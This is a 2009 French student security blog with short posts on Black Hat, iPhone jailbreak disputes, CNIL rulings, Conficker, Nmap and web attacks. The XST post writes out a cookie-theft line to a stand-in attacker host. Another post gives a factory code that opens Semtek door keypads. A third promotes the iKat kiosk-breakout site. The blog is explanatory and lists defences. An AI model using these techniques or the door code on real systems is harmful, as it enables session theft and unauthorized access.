édito

Bienvenue sur ce blog, point de chute des différentes informations ayant trait à la sécurité ou à la filière STI de l'ensib et remontées aux ensibiens par un désormais ingénieur sécurité junior (et oui, c'est la 3A).
Si d'autres ensibiens dans le cadre d'une veille liée à leur job [ou pas...] veulent remonter des infos qu'ils jugent susceptibles d'intéresser notre filière, n'hésitez pas à me contacter pour contribuer :)

- PiWi -    


jeudi 30 juillet 2009

blackhat c'est parti!

Ca y est, les salons orientés blackhat, Defcon et Blackhat ont commencé, et pour bien ouvrir les festivités les blackhats attaquent fort: si vous voulez un exemple des colonies de vacances des hackers pas éthiques du tout je vous invite à lire (parcourir suffira amplement ^^) le "magazine" qu'ils ont sorti dans la bonne humeur et l'ownage sans pitié. Et oui pour ceux qui l'auront survolé c'est bien violent! Du rm a tout va, des mots de passes qui fusent, des clés privées, bref il fait beau, c'est l'été, c'est la fête! Reste à déterminer si ce document relate bien ce qui a été fait ou s'il y a du fake dans tout ca (en tout cas très bien fait).

Mais fake ou pas, il y a bel et bien eu des dégats, ce fut tout d'abord le cas de binrev, puis beaucoup d'autre sites de whitehats ont été attaqués violemment pour l'ouverture de la conférence et comme vous avez pu le voir dans le document: Mitnik et Kaminsky ont pris très très cher.
Les icones du monde de la sécurité, aujourd'hui white hat, n'ont bénéficié d'aucune pitié. Vous pouvez d'ailleurs retrouver un article à ce sujet sur cnet. En tout cas Mitnick y reconnait la valeur du/des hacker(s) ayant réussi à exploser le serveur de kaminsky.

Bref ce blackhat 2009 commence bien, et promet de belles choses, comme, je le rappelle au passage, une démonstation de la prise de contrôle d'un Iphone sur simple envoi d'un SMS (donc l'utilisateur ne pourra rien y faire) pour ensuite espionner, le faire participer à un réseau de botnet toussa toussa...
à suivre donc :)

mercredi 29 juillet 2009

cyberarmaggedon c'est pour bientot!

un nouvel article de wired assez intéressant (et même marrant):
Apple est en ce moment en conflit avec l'EFF(Electronic Frontier Foundation) au sujet du jailbreak de l'iphone. l'EFF voudrait qu'il soit possible de lancer n'importe quelle application et non celles seulement autorisées, en d'autres termes, légaliser le jailbreak. Ce qu'on savait moins au sujet du jailbreak, c'est que ça peut être une arme très dangereuse!
En effet, si l'on en croit Apple, autoriser le jailbreak de l'iphone c'est ouvrir la porte aux hackers pour qu'ils puissent manipuler comme ils le souhaitent l'appareil, et notamment, provoquer des dénis de service sur les émetteurs (rien que ça) en exploitant le BBP (processeur de bande passante). L'analogie d'Apple est d'ailleurs assez violente:
Taking control of the BBP software would be much the equivalent of getting inside the firewall of a corporate computer — to potentially catastrophic result.

bien que ce puisse être une juste revanche pour les iphones victimes des émetteurs, de provoquer à leur tour des DoS.(à cause d'eux il peuvent recevoir des sms piégés...) C'est un peu tiré par les cheveux (qui a dit capillotracté?).
Mais en extrapolant, le juge de l'EFF en est arrivé à s'interroger sur Android (et pourquoi pas la symbian fondation): vu qu'il est open source, et suivant la logique d'Apple, il va constituer une menace pour le territoire....
Bien que le modèle super fermé de l'iPhone ait été une bonne chose à bien des égards et d'après eux, contribue à son succès, les arguments avancés dans cette gueguerre nous plongent dans la science fiction.

un argument tout de même à noter: d'après Apple, le jailbreaking permettrait au hacker d'en arriver à modifier la puce d'identification unique des iPhones, à savoir celle qui permet de s'identifier auprès d'un émetteur, ce qui rendrait possible les appels anonymes et avantagerait fortement les dealers.
Ah bah voila, cette fois ci c'est l'argument de la drogue! plus sérieusement, sans avoir besoin d'avancer un exemple précis stéréotypé, il pourrait être intéressant de regarder plus en détails les conséquences d'une telle altération : appel anonyme oui, mais qu'en est il de la captation de données par un hackeurs?

le jailbreak pourrait bien amener plus de problèmes de sécurité qu'on ne le pense. Mais dans cet article, Apple oublie un détail: les gens disposés à hacker l'iPhone n'auront pas attendu que le jailbreak soit légal pour faire leurs recherches et bidouiller....

pour ceux qui veulent tous les détails "en inglishe", c'est par ici

mardi 28 juillet 2009

Directannonces paye direct

certain se souvienne encore des cours de M. péguillan au sujet de la CNIL, et comme quoi on fait pas n'importe quoi des infos qu'on collecte sans rien demander à personne. Visiblement d'autres n'ont pas eu la chance (ou l'intérêt) d'avoir ce genre de mise en garde. c'est le cas de Directannonces qui pompait des infos sur les sites d'immobilier pour particuliers et vendait le tout à des banques ou agences. un "petit" rappel à l'ordre de la CNIL:40000€ d'amende ce qui équivaut (après quelques recherches ^^) à son capital... ou 2% de son CA. Autant dire ce n'est pas rien.
On peut remarquer que l'entreprise a vite fait de rajouter un onglet "sécurité juridique" et sur la page d'acceuil (en bas) un lien pour aller modifier/effacer ses données. Esperons qu'elle ai compris la lecon...

NB: ceci dit si le process de traitement à été légalisé le site en soit n'est pas légal, il manque justement les mentions légales....

par ici: l'article original

hack me I'm famous (or unconscious)

un petit billet à été publié sur the iphone blog à destination des visiteurs des blackhat et defcon munis d'Iphones, les recommandations sont assez marrantes à lire car très basiques mais il faut savoir qu'elles s'appliquent aussi à tout netbook/pc etc... et oui c'est l'ennui, quand on va dans ce genre de conférence c'est un peu comme un agneau qui irait se promener au milieu d'une meute de loups, donc mieux vaut équiper le-dit agneau (soit) d'une armure de plaques ^^.
pour petit rappel, defcon et blackhat sont des conférences réunissant quantités d'experts sécurité mais clairement orientés blackhat, en gros un meeting d' unethical hackers pour les hackers. autant dire que ça hack à tout va au sein même de la conférence :D...

pour reprendre synthétiquement:
n'avoir aucun moyen d'entrée par le réseau (désactiver ssh pour éviter le bruteforce ou peut être la légendaire 0 days ^^), ne rien stocker de confidentiel sur son poste (cookie safari pouvant contenir des mots de passe ou logins) , ne rien envoyer de confidentiel sur le réseau (ou si nécessaire en chiffré) .

tous les ans des personnes se font avoir, vous pourrez suivre ca cette année sur the wall of sheep

j'espère vous faire bientôt un petit billet sur des trucs abordables du salon.

jeudi 23 juillet 2009

quand roBotNET tape du high-score

networkworld viens de publier le top ten des botnets les soit-disant plus maychants, des noms donc qu'il peut être intéressant d'avoir en tête si vous en rencontrez. De plus, au vu des chiffres, il se peut que vous ayez contribué à leur high score. Conficker figure bien sur dans la liste, mais seulement à la dixieme place, les chiffres n'étant pas tout à fait a jour ( le temps de la collecte pour l'article les versions D et E ont vu le jour et fait leurs ravages). Bref, ce top ten vous donne un apercu bien sympatique de ce que peuvent faire ces malwares.

Ce petit classement fait echo au pwnie awards (prononcez pouni [d'où le poney]) dont vous avez du entendre parler sur Korben.
C'est une cérémonie entre experts sécurité qui vise à récompenser (ou pas...) les meilleurs performances, que ce soit dans l'ownage massif, les bugs les plus sympas (type ms08_067) ou à l'inverse les gros echecs (FAIL) en sécurité ou les attitudes les plus minables des sociétés face à des soucis de sécurité. la liste des nominés fait un bon récapitualtif des gros exploits/incidents de l'année.
le site des pwnie awards c'est par ici

mercredi 22 juillet 2009

Iphone pas aphone en tout cas...

Il faut croire que les ptits iphones aime pas les compositions, en effet un coktail sympathique vient d'être découvert: jailbreak+hack pour activer le push+AIM= broadcast général :).
c'est ce qu'a découvert un développeur allemand, quand quelqu'un lui a gentiment expliqué qu'il avait reçu un message qui ne lui était pas du tout destiné. Ainsi, ce serait une histoire d'ID de l'iphone utilisé par le programme (à savoir l'un des hacks installe le même pour tout le monde-> EPIC FAIL).

pour expliquer un peu plus:
jailbreaker un iphone est le fait de modifier le tel pour qu'il ne soit plus "verrouillé" et exploiter pleinement le téléphone, cela se traduit aussi par la possibilité d'installer des applications sans passer par l'appstore.
pour les iphones jailbreakés, il existe plusieurs petits hacks pour activer les notifications en push sur le téléphone. il semblerait donc que les iphones ayant un des hacks ont tous le meme ID et par conséquent ne sont pas différenciés par le service apple push.

Au final un message envoyé via instant messaging à quelqu'un possédant un Iphone jailbreaké+push sera diffusé à toutes les personnes qui ont elles aussi jailbreaké leur tel et activé les notifications en push via ces hacks. Voila un bon moyen de lancer des rumeurs à la con (ou de spammer en utilisant les ressources du apple's push service ).
heureusement que l'IM ne relève pas de la communication privée (ah si on me dit?! mince alors...)

bref c'est ici que ca se passe pour ceux qu'ont rien contre la langue de Shakespeare.

ceci dit si le deliver se fait juste sur la base d'un ID c'est plutot weak de la part d'apple....

[EDIT: puisque apparemment, et bien que détaillée, la nuance n'a pas été perçue je vais insister sur un point: j'ai bien parlé de téléphones jailbreakés, le fonctionnement est donc détourné et il n'est pas directement imputable à apple que des téléphones hors des conditions d'usages rencontrent des problèmes.
Toutefois, et compte tenu de la qualité habituelle des services d'Apple, si le deliver ne se fait que sur la base d'un ID modifiable par un simple programme, ca reste critique et décevant. La portée de cet incident est plus grande qu'il n'y parait car si plusieurs personnes ont eu le meme identifiant, c'est aussi possible d'avoir un programme qui permette de fixer son id sur l'identifiant de quelqu'un d'autre. Quid du delivery dans ce cas? si l'on peut de cette manière obtenir les messages d'autres personnes, il y a vraiment un problème...]

lundi 20 juillet 2009

Pas de veine, la CNIL autorise la biométrie

C'est une première, la CNIL autorise l'usage de la biométrie pour un concours.
Certains d'entre vous connaissent surement le GMAT (surtout si vous essayez de faire un master supplémentaire dans une école de commerce/management). La CNIL vient d'autoriser l'usage d'une biométrie dite « sans traces » et difficilement falsifiable : la cartographie du réseau veineux de la main. Ils estiment que cette information biométrique peut difficilement être collectée à l'insu de l'individu et encore moins falsifiée.
Cette exception faite, la CNIL rappelle toutefois qu'elle n'est pas favorable à l'usage de la biométrie.

Le détail par ici

Le titre est gracieusement fourni par Bastien

vendredi 17 juillet 2009

le pentest? ISSAF enseigner

Autre framework assez didactique dont je vous avais parlé: l'ISSAF 0.2.1 dans sa version B.
Si ce framework orienté système date un peu, il est particulièrement didactique et idéal pour l'apprentissage de la sécurité (que vous vous destiniez au pentest ou non).
Tous les tests sont exposés avec un protocole rappelant les TPs. Ils sont par conséquent aisément reproductibles. Vous pourrez le trouver ici

sécurité et développement web: OWASP

un billet qui traite de framework de sécurité.Nous allons parler de l'OWASP et notament du testing guide.L'Owasp est une communauté pour l'amélioration de la sécurité applicative. Son testing guide est dédié aux applications web et recense non seulement un ensemble de tests pour vérifier la sécurité d'une application mais aussi une méthodologie sur tout le projet, de la phase de conception à celle de vérification. Il peut donc servir aussi bien à un pentester qu'à un web développeur. Sans le lire dans sa totalité la partie listant les points à vérifier (et classés en sections) est assez exhaustive. Un framework des plus utiles donc, même pour ceux qui ne font pas particulièrement de sécurité mais veulent s'assurer que leur appli ne va pas se faire ouvrir en deux par le premier mec venu.

my conficker is fabulous \o/

vous avez recu un gentil petit mail vous expliquant que conficker avait été détecté sur un des postes de l'école, mais conficker, kesako??

une saloperie absolue diront certains, moi je dirai que ce ver est un petit bijou conceptuel et technique :) genre le ver 2.0 (c'est marketing). En effet, ce ver utilise de nombreuses méthodes de propagation:
  • la vulnérabilité ms08_067, pour les PC pas à jour.
  • les partages windows directement accessibles.
  • l'éxecution automatique des supports amovibles.
  • et le must, le bruteforce des mots de passe Active Directory (c'est là que les sociétés avec des admins peu rigoureux comprennent leur douleur: un conficker admin de domaine je vous laisse imaginer ^^)
ce sont les principaux vecteurs d'infections, mais ce n'est pas ce qui fait l'excellence de ce petit conficker, c'est son aptitude à se mettre à jour, réinstaller,etc.... un conficker ayant infesté une machine va immédiatement supprimer les points de restauration, modifier,désactiver voire désinstaller l'antivirus/firewall/update(bref tout ce qui peux le gener) et tenter de contacter un maximum d'autre machines sur le réseau où il se trouve pour essayer de se propager. maintenant, il faut savoir que chaque conficker essaie de se connecter quotidiennement pour se mettre à jour et retélécharger le nouveau binaire.

Le point de rendez-vous suivant est calculé massivement par tous les confickers connectés (cloud computing powaaa) et de plus, chacun embarque son système de validation pour s'assurer que le binaire qu'il récupère est bien signé par l'auteur de conficker. Il est ainsi très difficile de pouvoir "tromper" un conficker et bien que des groupes aient réussi à identifier l'algorithme de génération des noms de domaines (pt de rdv), il n'est pas possible de faire uploader d'autre binaires par les machines infestées.

bref ce ver a su protéger son integrité, exploiter bon nombre des vecteurs de communications actuels et est de ce fait, une horreur absolue à virer dans une entreprise (entre la compromission de l'AD les partages etc...)

un article très intéressant mais technique sur conficker pour ceux que ca intéresse (ca vaut le coup): http://mtc.sri.com/Conficker/
N.B: si vous n'êtes pas techniques, juste l'intro vous donnera des chiffres et une idée des ravages..

pour tous les gouts: l'article aborde conficker A et B il faut savoir que des versions jusqu'à E on été découvertes. et oui, l'auteur doit aimer à peaufiner toujours plus son "jouet"

Nmap télé est allumée, Nmap est là....

désolé pour le jdmp.
c'est aujourd'hui qu'une nouvelle version majeure de Nmap est publiée (la v5). L'occasion de vous rappeler ce qu'est ce petit programme et pourquoi en tant que STI vous devez absolument le connaitre (au moins de nom).

Nmap est principalement un scanner réseau, je dis principalement car depuis le temps il fait beaucoup de choses. il permet de scanner un périmètre à la recherche des ports ouvert sur la machines. il permet via des requêtes spécifiques d'identifier pour une bonne part les services écoutant sur ces ports et quand il a assez d'informations de détecter l'OS.

cette nouvelle version ajoute la possibilité de suivre l'évolution d'un périmètre (diff entre différents scans) et de rediriger du traffic. Bref encore de nouvelles fonctionnalités qui viennent assurer sa position d'indispensable dans votre toolbox de STI (aux cotés du petit über puissant netcat).

au passage, sachez que nmap est aussi un bon moyen sur votre reseau domestique de vérifier que tout est en ordre sur un pc, car les malwares associés aux rootkit rendent bien souvent netstat complètement inopérant détection de ports frauduleusement ouverts

XST : "Prenez un cookie, M. Anderson"

Ce billet présente une vulnérabilité liée aux applications web, permettant par exemple de contourner certaines protections de navigateurs tels qu'Internet Explorer.

Le Cross-Site Tracing, ou XST pour les intimes, est une technique permettant de récupérer des informations telles que des cookies provenant d'un site arbitraire (même d'un serveur autre que celui ayant émis la page contenant le code).
XST se base sur la méthode HTTP TRACE, implémentée dans les principaux serveurs web (lisez Apache et IIS au minimum), qui est surtout (seulement ?) utilisée à titre de débogage. Le principe est simple, on envoie une requête et le serveur réémet ce qu'il a reçu.

Là où ça devient intéressant, c'est que le serveur va également renvoyer des choses telles que les cookies. Prenons un exemple : René-Gonzague se loggue sur son site préféré (A), ce qui créé un cookie pour le domaine A. Son pote Hubert-Théophile lui passe un lien vers une page pour télécharger son ISO de photos de vacances de 7Go sur un serveur B, contenant entre autre un bout de javascript. Ce script va faire une requête en AJAX sur le site A en utilisant la méthode TRACE. En fait, cette requête va être effectuée par le navigateur, qui du coup va envoyer le cookie du site A (puisque c'est son boulot). Le serveur derrière A va se contenter de réémettre ce qu'il a reçu, cookie compris, au gentil script JS. Celui-ci va alors pouvoir appliquer la technique standard de cookie stealing et envoyer le cookie au méchant hacker (avec bien sûr une URL du type "www.reallybadhacker.com/steal_my_cookie.php?niom-niom=" + cookie).

Ce qui est sympa, c'est que les protections des navigateurs du style "tu ne peux manger que le cookie du site d'où tu proviens" sont contournées, il suffit juste de pouvoir émettre une requête sur un autre serveur (attention tout de même, c'est parfois bloqué en standard, cf les applets Java).

Plusieurs façons d'éviter de voir ses cookies partir dans la nature :
  • désactiver le javascript (hardcore dans ce monde 2.0), mais on peut très bien parvenir à nos fins avec du flash ou du java
  • côté serveur, empêcher les requêtes TRACE avec une rewrite rule
  • ne pas aller sur Internet, parce que c'est plein de violeurs pédophiles néo-nazis
  • ...
Moralité : cookie l'est passé mon mot de passe ?

jeudi 16 juillet 2009

l'ANSSI naitra

comme je vous l'ai annoncé, l'équivalent de la NSA a vu le jour en France le 7 juillet dernier sous le nom d'ANSSI (Agence Nationale pour la Sécurité des Systèmes d'Information). elle vient emboiter le pas à la DCSSI dans la mission de protection et de promotion de la sécurité des SI nationaux.

le site fournit pas mal d'informations, un renvoi vers le livre blanc, le certa, etc... bref si vous vous intéressez un peu à la sécurité organisationnelle, c'est bon à savoir.
Le site propose aussi des offres d'emploi plus ou moins techniques, à vous de surveiller.

le site de l'anssi

NB: pour ceux qui ne connaissent pas le certa (Centre d'Expertise Gouvernemental de Réponse et de Traitement des Attaques informatiques ), cette instance publique fournit quelques informations relative a la sécurité mais surtout, publie des bulletins d'avis régulièrement, une analyse de l'évolution des menaces, des alertes relatives aux vulnérabilités récemment divulguées etc...

si vous voulez etre tenu un peu au courant sans se faire spammer pour le moindre truc ca peut etre interessant de suivre depuis ce site.

l'usine n'aime pas la sécurité

Ce n'est pas nouveau et c'est bien connu, les configurations par défaut ne font pas bon ménage avec la sécurité, les WEP farmers du coin en savent quelque chose ^^.
Ce qui est plus gênant, ce sont les configurations par défaut d'usine, bien souvent immuables.
On apprend ainsi (avis a ceux qui possèdent des digicodes semtek) que pour ouvrir bon nombre de portes protégées par ces boitiers il suffit de taper ***00000099#*, le genre de disclosure assez sympathique (pas pour tout le monde).
à suivre plus en détail sur le blog de david rusenko (au passage jetez un oeil au header ;) )...

Petit anecdote, sachez qu'il en est de même pour le fameux ucopia de l'école, en effet, ce portail captif ne serait distribué que sous forme d'appliance. De plus, le compte que possède le client est un compte utilisateur créé juste pour permettre l'administration, le compte root de l'appliance étant lui,[bien] gardé par ucopia. seulement voilà, le mot de passe du fameux compte root est le même pour toutes les boites, et j'en connais qui le connaissent ;).....

le HPP késako?

Certain d'entre vous on peut etre entendu parler de HPP ou non abrégé de HTTP parameter pollution. Derrière ce nom évocateur se cache le principe tout simple de passer plusieurs valeur pour un même paramètre.
  • par exemple quel est le résultat d'une requete get de mapage.php?id=valeur1&id=valeur2?
Justement il est très variable et si l'idée de mettre plusieurs valeurs pour un même paramètre avait déjà été évoquée, de réelles attaques n'avaient pas été mises en pratique. C'est depuis quelques temps chose faite, un labo (minded security) a pris le temps de comparer les comportements de différentes solutions et les résultats sont plutôt intéressant et parfois tout à fait exploitables.

le blog de minded security sur le sujet. il y a un PDF explicatif et dans les commentaires un lien vers des vidéos de proof of concept sur yahoo

(une explication plus détaillée sur le fonctionnement sera faite prochainement sur le wiki)

iKat, ou comment sortir de cage

Un petit billet pour vous presenter ikat.
Outre un header comme qui dirait..."attractif", ce site est en fait une plateforme des plus intéressantes car elle permet par des interactions ajax d'ouvrir un shell, d'exécuter des commandes etc... sur une machine. A quoi bon avoir la main sur notre machine puisqu'on l'a déjà pour aller sur ce site? Justement c'est pour quand vous n'êtes pas sur votre machine, mais plutôt dans un kiosque (par exemple les bornes ratp internet) dans ce genre de poste vous êtes bloqués dans le navigateur avec pas mal de contraintes, c'est la qu'Ikat intervient et permet de reprendre un contrôle plus complet du poste (moins évident s'il n'y a pas de clavier, mais bon y'a toujours le clavier virtuel krosoft) à connaitre donc, ca peut toujours servir un jour :).
http://ikat.ha.cked.net/